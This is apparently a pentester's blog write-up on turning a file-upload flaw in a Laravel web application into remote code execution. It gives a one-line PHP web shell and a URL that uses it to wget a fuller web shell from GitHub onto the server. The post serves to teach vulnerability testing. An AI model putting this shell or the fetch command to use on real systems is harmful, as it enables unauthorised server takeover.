File upload to RCE

Sid
3 min readMar 1, 2021

--

In this post, I will try to guide you through an example of the type of vulnerabilities you may encounter when performing a pentest. In this case, I managed to compromise a web application through a file upload and then execute remote code.

Analyzing the application

As part of the process I was provided with credentials for the application as a normal user. Upon logging in, I started by browsing through all the pages and examining the functionality of the app.

After clicking on several pages of the site, I looked at a page that allowed me to upload a document.

Nowhere does the application indicate what type of files can be uploaded, the first thing that came to mind was uploading an svg image with an xss payload. When I go to the image I see that it executes the xss.

Validation

Now I knew that the upload file worked, but I still wanted to see what Burp Suite showed me. When reviewing the request in Burp Suite, notice that the images were being placed in the following directory: / storage / clients.

Clicking on the name the file is saved with allows me to open the image in the path like https://site.com/storage/clients/73947/test.svg

In the Burp Suite request, I could also see that the session cookie returned by the server as laravel_session. Laravel is a PHP framework, so it already confirmed in which language the application was developed.

Proof of concept

Next step: bypass file upload with a PHP web shell. This was done by intercepting and manipulating the following POST request:

Now all that was required was a simple change to the filename parameter in Content-Disposition to include .php at the end of the jpeg filename. Then I also added a small code snippet to include a simple PHP backdoor as shown below:

<?php echo shell_exec($_GET[‘e’].’ 2>&1'); ?>

With the file loaded, now I just had to click on the image to verify that the shell was up.

After running the id command, the user you were logged in with was displayed.

Shell time

Now I needed a nicer shell. To do this, just copy a shell directly from github.

https://site.com/storage/clients/1524485403/bypassimg.php?e=wget%20https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O lmao.php

After this, I went back to the browser, navigated to https://site.com/storage/clients/1524485403/lmao.php and had my shell ready.

then we navigate a bit between the folders.

Summary

An authenticated user could bypass the file upload content filter to run arbitrary code on the operating system. This would affect the confidentiality and integrity of the stored data.

--

--

Sid
Sid

Responses (2)